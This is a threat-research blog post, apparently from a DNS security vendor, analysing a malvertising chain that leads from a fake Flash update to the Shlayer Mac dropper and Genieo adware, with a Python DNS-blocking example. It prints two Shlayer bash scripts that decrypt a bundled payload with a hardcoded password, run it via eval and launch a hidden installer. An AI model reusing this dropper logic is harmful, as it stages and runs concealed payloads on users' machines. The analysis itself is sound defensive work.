It’s no secret that the pervasiveness of ad networks has greatly diminished the web browsing experience in recent years. With this has also come criminals and other miscreants who are using the drive for web advertising revenue to deliver malware.
While doing commodity web surfing, I noticed a news website redirected to www[.]temper[.]world (a domain that had been registered only 5 days before it was observed in an attack) and attempted to phish users with warnings that Flash was out of date. As I hadn’t looked at Mac malware recently, I decided to take a look. Clicking through would download Shlayer (SHA256: 70a2250c44f1e45948169513c390c3abdfc84d806d06d535ac91c49b1d4bbec0, no VT detections), which would then download Genieo (SHA256: 0e8d54fdc43615989da4d4697a6dd8b40f54aa2001a71bc6c57a9d7a01732cec, 19/57 VT detections), which is classified as AdWare/PUA. I classify it as malware since it uses overt deception to phish users into installing it.
Shlayer, in this case, uses two encrypted files that are decrypted by a script which produces the installer for Genieo. The password is hardcoded, and open-source research shows this actor has been using the same password for at least about 3 months. The scripts were in the form of:
#!/bin/bash
# First script: runs from the mounted disk image, stages resources under /tmp/<user>,
# then decrypts the "enc" file with a hard-coded password and passes the plaintext to eval
cd "$(dirname "$BASH_SOURCE")"
fileDir="$(dirname "$(pwd -P)")"
username=$(whoami)
mkdir -p /tmp/"$username"
cp "$fileDir"/Resources/paramsJson.json /tmp/"${USER}"/paramsJson.json
cd "$fileDir"/Resources/
rm -rf /tmp/"$username"/appicon.icns
cp AppIcon.icns /tmp/"$username"/appicon.icns
# AES-256-CBC, no salt, base64-encoded; the same password is reused for "enc2" below
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:6341145384 <"$fileDir"/Resources/enc)"
--
#!/bin/bash
# Second script: decrypts "enc2" into a fresh temp directory, unzips it and launches the installer
tmp_path="$(mktemp -d /tmp/XXXXXXXXX)"
openssl enc -base64 -d -aes-256-cbc -nosalt -out "$tmp_path/installer.zip" -pass pass:6341145384 < enc2
unzip "$tmp_path"/installer.zip -d "$tmp_path" > /dev/null 2>&1
echo "$tmp_path"/Installer.app
# $session_guid and $volume_name are not set in this excerpt; they come from the surrounding environment
open -a "$tmp_path"/Installer.app --args "s" "$session_guid" "$volume_name"
As both files are encrypted, there is nothing for AV to detect until decryption begins. What is also interesting is that the Player.dmg file references another newly registered domain, jurisdiction[.]world, that doesn’t appear to be part of the attack chain.
This highlights the importance of using DNS to block threats. Not only is this malware delivered from one of the new gTLDs that doesn’t have a good reputation, it is delivered from a newly registered domain, which is suspicious in itself, and such a domain can be quickly identified as bad and blocked. Blocking the underlying IP address would cause great collateral damage, as the sites are hosted at Akamai. In addition, it is possible to block newly registered and newly observed domains outright, which would also stop such attacks.
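As an added illustration of the DNS-side policy described above (not ThreatSTOP's own code or lists), the following script classifies queries from a resolver log by registration age and TLD. The log lines, registration feed, risky-TLD set and 30-day threshold are all constructed assumptions for this example.

```python
from datetime import datetime, date

# Example policy values (assumptions for this example, not a vendor list):
RISKY_TLDS = {"world"}              # new gTLDs treated as low-reputation
NEW_DOMAIN_DAYS = 30                # younger than this counts as "newly registered"
MULTI_PART_SUFFIXES = {"co.uk"}     # tiny stand-in for a public-suffix list

# Constructed registration feed: registrable domain -> registration date.
# A domain absent from the feed has never been observed by it.
REG_FEED = {
    "temper.world": date(2019, 2, 15),
    "oldworld.world": date(2016, 1, 1),
    "example.com": date(1995, 8, 14),
    "example.co.uk": date(2005, 3, 1),
    "oldsite.net": date(2010, 1, 1),
}

# Constructed resolver log: timestamp, client IP, queried name.
SAMPLE_LOG = """\
2019-02-20T10:01:02 10.0.0.5 www.temper.world.
2019-02-20T10:01:03 10.0.0.5 cdn.JURISDICTION.world
2019-02-20T10:01:04 10.0.0.7 www.example.com
2019-02-20T10:01:05 10.0.0.7 static.example.co.uk
2019-02-20T10:01:06 10.0.0.9 updates.oldsite.net
2019-02-20T10:01:07 10.0.0.9 news.oldworld.world
2019-02-20T10:01:08 10.0.0.9 printer01
"""

def registrable_domain(qname):
    """Reduce a query name to its registrable domain (www.temper.world -> temper.world)."""
    labels = qname.lower().rstrip(".").split(".")
    if len(labels) < 2:
        return None  # single-label internal name: nothing to look up
    n = 3 if ".".join(labels[-2:]) in MULTI_PART_SUFFIXES else 2
    return ".".join(labels[-n:])

def classify(qname, observed, feed):
    """Verdict for one query based only on registration age and TLD reputation."""
    dom = registrable_domain(qname)
    if dom is None:
        return "allow:internal"
    reg = feed.get(dom)
    if reg is None:
        return "block:newly-observed"        # never seen by the feed
    age = (observed - reg).days
    if age < NEW_DOMAIN_DAYS:
        return "block:newly-registered(%dd)" % age
    if dom.rsplit(".", 1)[-1] in RISKY_TLDS:
        return "alert:risky-tld"             # old enough, but a low-reputation gTLD
    return "allow"

def triage_log(log_text, feed):
    """Run classify() over each log line; returns [(qname, verdict), ...]."""
    out = []
    for line in log_text.splitlines():
        ts, _client, qname = line.split()
        out.append((qname, classify(qname, datetime.fromisoformat(ts).date(), feed)))
    return out
```

Run with `triage_log(SAMPLE_LOG, REG_FEED)`: the 5-day-old temper.world query is blocked as newly registered, the unseen jurisdiction.world query as newly observed, and the old .world domain only raises an alert.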
ThreatSTOP users are protected against this threat by our TS Curated – Phishing – Domains and TS Originated – Phishing – Domains targets.